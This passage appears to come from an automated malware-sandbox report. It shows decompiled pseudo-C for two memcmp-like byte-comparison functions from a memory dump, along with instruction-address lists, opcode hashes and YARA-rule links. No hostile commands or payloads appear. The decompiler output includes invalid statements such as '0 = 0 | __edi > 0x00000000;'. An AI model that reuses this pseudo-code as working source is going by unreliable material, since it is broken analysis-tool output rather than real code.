				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x00403dba
0x00403dba
0x00403dc0
0x00403e37
0x00403e39
0x00403e3b
0x00000000
0x00000000
0x00403e41
0x00403e47
0x00403ece
0x00403ed0
0x00403ed2
0x00000000
0x00000000
0x00403ed8
0x00403ede
0x00403f65
0x00403f67
0x00403f69
0x00000000
0x00000000
0x00403f6f
0x00403f75
0x00403ffc
0x00403ffe
0x00404000
0x00000000
0x00000000
0x00404006
0x0040400c
0x00404093
0x00404095
0x00404097
0x00000000
0x00000000
0x004040a3
0x0040412b
0x0040412d
0x0040412f
0x00000000
0x00000000
0x00404135
0x0040413b
0x004041c2
0x004041c4
0x004041c6
0x004041d4
0x004041d6
0x004041e3
0x004041e3
0x004041d6
0x00000000
0x004041c6
0x00404148
0x0040414a
0x00404162
0x0040416a
0x0040416c
0x00404184
0x0040418c
0x0040418e
0x004041a6
0x004041ae
0x004041b0
0x004041b9
0x004041b9
0x00000000
0x004041b0
0x00404197
0x004041a0
0x00000000
0x00000000
0x00000000
0x004041a0
0x00404175
0x0040417e
0x00000000
0x00000000
0x00000000
0x0040417e
0x00404153
0x0040415c
0x00000000
0x00000000
0x00000000
0x0040415c
0x004040b1
0x004040b3
0x004040cb
0x004040d3
0x004040d5
0x004040ed
0x004040f5
0x004040f7
0x0040410f
0x00404117
0x00404119
0x00404122
0x00404122
0x00000000
0x00404119
0x00404100
0x00404109
0x00000000
0x00000000
0x00000000
0x00404109
0x004040de
0x004040e7
0x00000000
0x00000000
0x00000000
0x004040e7
0x004040bc
0x004040c5
0x00000000
0x00000000
0x00000000
0x004040c5
0x00404019
0x0040401b
0x00404033
0x0040403b
0x0040403d
0x00404055
0x0040405d
0x0040405f
0x00404077
0x0040407f
0x00404081
0x0040408a
0x0040408a
0x00000000
0x00404081
0x00404068
0x00404071
0x00000000
0x00000000
0x00000000
0x00404071
0x00404046
0x0040404f
0x00000000
0x00000000
0x00000000
0x0040404f
0x00404024
0x0040402d
0x00000000
0x00000000
0x00000000
0x0040402d
0x00403f82
0x00403f84
0x00403f9c
0x00403fa4
0x00403fa6
0x00403fbe
0x00403fc6
0x00403fc8
0x00403fe0
0x00403fe8
0x00403fea
0x00403ff3
0x00403ff3
0x00000000
0x00403fea
0x00403fd1
0x00403fda
0x00000000
0x00000000
0x00000000
0x00403fda
0x00403faf
0x00403fb8
0x00000000
0x00000000
0x00000000
0x00403fb8
0x00403f8d
0x00403f96
0x00000000
0x00000000
0x00000000
0x00403f96
0x00403eeb
0x00403eed
0x00403f05
0x00403f0d
0x00403f0f
0x00403f27
0x00403f2f
0x00403f31
0x00403f49
0x00403f51
0x00403f53
0x00403f5c
0x00403f5c
0x00000000
0x00403f53
0x00403f3a
0x00403f43
0x00000000
0x00000000
0x00000000
0x00403f43
0x00403f18
0x00403f21
0x00000000
0x00000000
0x00000000
0x00403f21
0x00403ef6
0x00403eff
0x00000000
0x00000000
0x00000000
0x00403eff
0x00403e54
0x00403e56
0x00403e6e
0x00403e76
0x00403e78
0x00403e90
0x00403e98
0x00403e9a
0x00403eb2
0x00403eba
0x00403ebc
0x00403ec5
0x00403ec5
0x00000000
0x00403ebc
0x00403ea3
0x00403eac
0x00000000
0x00000000
0x00000000
0x00403eac
0x00403e81
0x00403e8a
0x00000000
0x00000000
0x00000000
0x00403e8a
0x00403e5f
0x00403e68
0x00000000
0x00000000
0x00000000
0x00403dc2
0x00403dc2
0x00403dc9
0x00403dcb
0x00403ddf
0x00403ddf
0x00403de7
0x00403de9
0x00403dfd
0x00403dfd
0x00403e05
0x00403e07
0x00403e1b
0x00403e1b
0x00403e23
0x00403e25
0x00403e2e
0x00403e2e
0x00000000
0x00403e25
0x00403e0d
0x00403e10
0x00403e19
0x00000000
0x00000000
0x00000000
0x00403e19
0x00403def
0x00403df2
0x00403dfb
0x00000000
0x00000000
0x00000000
0x00403dfb
0x00403dd1
0x00403dd4
0x00403ddd
0x00000000
0x00000000
0x00000000
0x00403ddd
0x00403db2
0x00403db2
0x00404ba3

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 83a3bd090a1eda59668e791c2c9f7397b61b011db2ce7de0cd7ccd78dbecc434
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 38C1917320509349DF6D4A39843417FBEB56EA17B231A07BED4B2DB2C4EE38C6689514

Uniqueness

Uniqueness Score: -1.00%

Function 004039A2, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004039A2(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x004039a2
0x004039a2
0x004039a2
0x004039a8
0x00403a2f
0x00403a31
0x00403a33
0x00403db2
0x00403db2
0x00404ba3
0x00404ba3
0x00403a39
0x00403a3f
0x00403ac6
0x00403ac8
0x00403aca
0x00000000
0x00000000
0x00403ad0
0x00403ad6
0x00403b5d
0x00403b5f
0x00403b61
0x00000000
0x00000000
0x00403b67
0x00403b6d
0x00403bf4
0x00403bf6
0x00403bf8
0x00000000
0x00000000
0x00403c04
0x00403c8c
0x00403c8e
0x00403c90
0x00000000
0x00000000
0x00403c96
0x00403c9c
0x00403d23
0x00403d25
0x00403d27
0x00000000
0x00000000
0x00403d2d
0x00403d33
0x00403daa
0x00403dac
0x00403dae
0x00403db0
0x00403db0
0x00000000
0x00403dae
0x00403d3c
0x00403d3e
0x00403d52
0x00403d5a
0x00403d5c
0x00403d70
0x00403d78
0x00403d7a
0x00403d8e
0x00403d96
0x00403d98
0x00403da1
0x00403da1
0x00000000
0x00403d98
0x00403d83
0x00403d8c
0x00000000
0x00000000
0x00000000
0x00403d8c
0x00403d65
0x00403d6e
0x00000000
0x00000000
0x00000000
0x00403d6e
0x00403d47
0x00403d50
0x00000000
0x00000000
0x00000000
0x00403d50
0x00403ca9
0x00403cab
0x00403cc3
0x00403ccb
0x00403ccd
0x00403ce5
0x00403ced
0x00403cef
0x00403d07
0x00403d0f
0x00403d11
0x00403d1a
0x00403d1a
0x00000000
0x00403d11
0x00403cf8
0x00403d01
0x00000000
0x00000000
0x00000000
0x00403d01
0x00403cd6
0x00403cdf
0x00000000
0x00000000
0x00000000
0x00403cdf
0x00403cb4
0x00403cbd
0x00000000
0x00000000
0x00000000
0x00403cbd
0x00403c12
0x00403c14
0x00403c2c
0x00403c34
0x00403c36
0x00403c4e
0x00403c56
0x00403c58
0x00403c70
0x00403c78
0x00403c7a
0x00403c83
0x00403c83
0x00000000
0x00403c7a
0x00403c61
0x00403c6a
0x00000000
0x00000000
0x00000000
0x00403c6a
0x00403c3f
0x00403c48
0x00000000
0x00000000
0x00000000
0x00403c48
0x00403c1d
0x00403c26
0x00000000
0x00000000
0x00000000
0x00403c26
0x00403b7a
0x00403b7c
0x00403b94
0x00403b9c
0x00403b9e
0x00403bb6
0x00403bbe
0x00403bc0
0x00403bd8
0x00403be0
0x00403be2
0x00403beb
0x00403beb
0x00000000
0x00403be2
0x00403bc9
0x00403bd2
0x00000000
0x00000000
0x00000000
0x00403bd2
0x00403ba7
0x00403bb0
0x00000000
0x00000000
0x00000000
0x00403bb0
0x00403b85
0x00403b8e
0x00000000
0x00000000
0x00000000
0x00403b8e
0x00403ae3
0x00403ae5
0x00403afd
0x00403b05
0x00403b07
0x00403b1f
0x00403b27
0x00403b29
0x00403b41
0x00403b49
0x00403b4b
0x00403b54
0x00403b54
0x00000000
0x00403b4b
0x00403b32
0x00403b3b
0x00000000
0x00000000
0x00000000
0x00403b3b
0x00403b10
0x00403b19
0x00000000
0x00000000
0x00000000
0x00403b19
0x00403aee
0x00403af7
0x00000000
0x00000000
0x00000000
0x00403af7
0x00403a4c
0x00403a4e
0x00403a66
0x00403a6e
0x00403a70
0x00403a88
0x00403a90
0x00403a92
0x00403aaa
0x00403ab2
0x00403ab4
0x00403abd
0x00403abd
0x00000000
0x00403ab4
0x00403a9b
0x00403aa4
0x00000000
0x00000000
0x00000000
0x00403aa4
0x00403a79
0x00403a82
0x00000000
0x00000000
0x00000000
0x00403a82
0x00403a57
0x00403a60
0x00000000
0x00000000
0x00000000
0x00403a60
0x004039b5
0x004039b7
0x004039cf
0x004039d7
0x004039d9
0x004039f1
0x004039f9
0x004039fb
0x00403a13
0x00403a1b
0x00403a1d
0x00403a26
0x00403a26
0x00000000
0x00403a1d
0x00403a04
0x00403a0d
0x00000000
0x00000000
0x00000000
0x00403a0d
0x004039e2
0x004039eb
0x00000000
0x00000000
0x00000000
0x004039eb
0x004039c0
0x004039c9
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 30be2794807ce81a932dc9e1826ad67b1c6955bdd746b6622a3b8c94bfd516e3
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: E0C1B33320905349DF5D4A39843017FBEA55EA17B231A07BED4F2EB2C4EE38D7689614

Uniqueness

Uniqueness Score: -1.00%

Function 021F08EE, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: 45893cfc2110a2cd1a96551fe2a68993f6149343a10e5061ae246f5beab2331f
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: 4F110676A00108AFDB50DFA9C88486DF7FEFF58654B504069ED19D3315F3709E40C660

Uniqueness

Uniqueness Score: -1.00%

Function 021F09DE, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: 29738e4e81c19f0bc247b806ffd13fca69ed15e5ece2bd3c358d62a28e0bc5b7
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: 21E012397A46499FC794CBA8C841D15B3F9EB0D760B154294FD25C73A1E734EE00DA50

Uniqueness

Uniqueness Score: -1.00%

Function 021F0A1C, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 671c5bf52f290c6b03d29a6d05358e14a92ca35f2a5dafb6d0de2e6f608615de
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
